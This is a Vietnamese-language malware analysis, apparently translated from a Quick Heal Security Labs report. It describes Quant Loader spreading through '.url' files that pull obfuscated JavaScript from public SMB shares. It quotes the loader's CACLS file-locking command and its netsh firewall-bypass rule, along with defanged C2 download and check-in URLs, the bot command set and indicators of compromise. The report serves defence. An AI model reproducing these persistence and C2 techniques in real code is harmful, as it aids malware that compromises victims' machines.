Tuần trước, chúng tôi đã đăng bài viết về sự xuất hiện của một phương thức tấn công mới '.url' được sử dụng để phát tán phần mềm độc hại. Trong bài viết này, chúng ta sẽ đi sâu vào chuỗi tấn công của phương thức '.url' này và trình bày chi tiết về phần mềm độc hại Quant Loader đang tích cực sử dụng nó.
Chúng ta hãy xem chuỗi tấn công bên dưới mô tả trình tự thực hiện được quan sát thấy trong cuộc tấn công này, trong đó tệp “.url” được sử dụng để phát tán phần mềm độc hại.

Sau đây là hình tóm tắt quy trình của chuỗi tấn công.

Như đã giải thích ở trên, nhìn chung “.url” chứa URL (“https://” hoặc “https://”), nhưng trong trường hợp này, chúng tôi đã quan sát thấy các chia sẻ SMB được truy cập để thực thi JavaScript độc hại.

Tệp tin trên có liên quan đến CVE-2016-3353, trong đó Internet Explorer xử lý sai các tệp '.url' từ vùng Internet và cho phép kẻ tấn công từ xa vượt qua các hạn chế truy cập theo ý định thông qua một tệp tin được tạo sẵn.
Các chia sẻ SMB này có thể truy cập công khai và không cần xác thực. Hình 3 và 4 hiển thị vị trí chia sẻ SMB công khai “buyviagraoverthecounterusabb[.]net/documents/” nơi lưu trữ các tệp JavaScript độc hại. Địa chỉ IP của vị trí chia sẻ SMB độc hại là “91.102.153.90”.


Hình ảnh sau đây cho thấy mã JavaScript độc hại được gửi đến nạn nhân thông qua giao thức SMB.

Khi mở JavaScript độc hại, nó sẽ mở bằng ứng dụng 'wscript.exe'.

Phần mềm độc hại ở giai đoạn thứ hai được tải xuống bằng JavaScript độc hại sau khi nạn nhân nhấp vào 'Mở', như thể hiện trong Hình 5. JavaScript độc hại này được che giấu rất kỹ và chỉ được sử dụng làm trình tải xuống ở giai đoạn đầu tiên.

Phần mềm độc hại giai đoạn hai được tải xuống thư mục '%TEMP%' bằng JavaScript và được khởi chạy thông qua 'cmd.exe'. Đây là một tệp thực thi được mã hóa rất phức tạp, được thực thi trực tiếp trong bộ nhớ. Phần mềm độc hại này dường như là một biến thể của ' Quant Loader ' và có thể được sử dụng để tải xuống các phần mềm độc hại khác. Tại thời điểm phân tích của Quick Heal Security Labs, chúng tôi không quan sát thấy phần mềm độc hại nào được tải xuống bởi Quant Loader. Hãy cùng xem xét cách thức hoạt động của phần mềm độc hại Quant Loader.
Phần mềm độc hại Quant Loader kiểm tra toàn bộ vị trí bàn phím của hệ thống thông qua mục “Keyboard Layout\Preload”. Nó sẽ thoát nếu vị trí đó nằm trong số các vị trí của Nga, Ukraine và Kazakhstan.

Quant Loader sử dụng khóa registry sau để xác định cấu hình 32/64 bit của hệ thống nạn nhân. Sau đó, nó sử dụng thông tin tương tự như một phần của yêu cầu CNC trong khi giao tiếp với máy chủ CnC.
HKLM\ PHẦN MỀM \ Microsoft \ Windows \ CurrentVersion ProgramFilesDir (x86)
Nó cũng kiểm tra sự hiện diện của các mục đăng ký sau.

Nó thả một bản sao tự động có tên 'dwm.exe' vào ' Thư mục \<8DigitNumeric>' và thiết lập để tự động thực thi thông qua mục "Run" trong registry. Việc này được thực hiện để duy trì tính ổn định trong hệ thống.

Mã số 8 chữ số này được sử dụng làm Bot ID (BotId) khi giao tiếp với Máy chủ CNC. BotId được tạo ra thông qua các bước sau:
- Đọc 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid'
- Chỉ trích xuất các chữ số từ giá trị của ID máy theo trình tự xảy ra
- Bỏ qua 5 chữ số đầu tiên và xem xét 8 chữ số từ 5 trở đi

Sau đó, nó sẽ thay đổi quyền truy cập của người dùng vào thư mục 8 chữ số và tệp 'dwm.exe' sang chế độ đọc cho người dùng đã đăng nhập. Điều này hạn chế người dùng xóa hoặc sửa đổi thư mục và tệp 'dwm.exe'. Điều này được thực hiện bằng cách sử dụng tệp CACLS Windows chính hãng thông qua lệnh sau.
cmd /c echo Y|CACLS “c:\users\ \appdata\roaming\48378942\dwm.exe” /P “ :R”
Sau đó, Quant Loader sẽ thêm quy tắc bên dưới vào Tường lửa với tên “Quant” cho phép phần mềm độc hại giao tiếp trên Internet bằng cách bỏ qua các quy tắc của Tường lửa.
netsh advfirewall firewall add rule name=”Quant” program=”c:\users\ \appdata\roaming\48378942\dwm.exe” dir=Hành động ra=cho phép
Nó cũng cố gắng kết nối tới miền CNC 'wassronledorhad[.]in' và tải xuống các tệp độc hại khác.
CNC không phản hồi khi phân tích được thực hiện. Tuy nhiên, phân tích tĩnh cung cấp một số thông tin chi tiết về khả năng giao tiếp của CNC và các chức năng khác của Quant Loader.
Các tập tin bên dưới sẽ được tải xuống nếu máy chủ CNC còn hoạt động.
hxxp://wassronledorhad.in/q2/lib/zs.dll.c
hxxp://wassronledorhad.in/q2/lib/bs.dll.c
hxxp://wassronledorhad.in/q2/lib/sql.dll.c
Các tệp này được lưu trữ trong thư mục %APPDATA%\z dưới dạng zs.dll, bs.dll và sqlite3.dll tương ứng.

Nó kiểm tra kích thước tệp 'zs.dll' và 'sqlite3.dll' xem có nhỏ hơn 0x20000 không. Sau đó, nó thực thi hàm "Main" từ zs.dll.

Quant Loader đã cố gắng gửi các yêu cầu sau tới Máy chủ CNC.
hxxp://wassronledorhad[.]in/q2/index.php?id=48378942&c=2&mk=75490e&il=H&vr=1.73&bt=32
Trong đó id = BotId, c = bộ đếm yêu cầu, bt = hệ thống 32/64 bit
Nó chờ lệnh từ máy chủ CNC có cấu trúc sau:
[BotId][Lệnh][Dữ liệu]
Lệnh có thể là một trong những lệnh sau – “pwd”, “exe”, “doc”, “dll”.

Lệnh “pwd” cũng được phát hiện là thực thi zs.dll với hàm “Main”.
Đối với các lệnh còn lại, phần mềm độc hại sẽ tạo một tệp có tên là dấu thời gian Windows trong thư mục 'temp'.

Nếu lệnh là “exe” thì nó sẽ thực thi tệp bằng ShellExecute API.

Nếu lệnh là “doc” thì nó sẽ thực thi tệp bằng WinExec API.

Nếu lệnh là “dll” thì nó sử dụng “LoadLibrary” và “GetProcaddress” để thực thi chức năng mong muốn từ dll như đã thấy trong hình 13 trước đó.
Do đó, tùy thuộc vào các lệnh, bot có thể tải xuống các tệp độc hại khác và thực thi chúng.
Quant Loader hiện đang sử dụng vectơ tấn công '.Url'. Chúng ta có thể thấy sự gia tăng sử dụng vectơ tấn công mới này (.url) bởi các nhóm phần mềm độc hại khác trong những ngày tới.
Các dấu hiệu của sự thỏa hiệp:
50C359167CC74A962CACAFF2A795B23C
4394536E9A53B94A2634C68043E76EF8
buyviagraoverthecounterusabb[.]net/documents/B200795218387[.]js
91.102.153.90
Chuyên gia về vấn đề đối tượng
- Pradeep Kulkarni, Amar Patil, Aniruddha Dolas | Phòng thí nghiệm bảo mật chữa lành nhanh


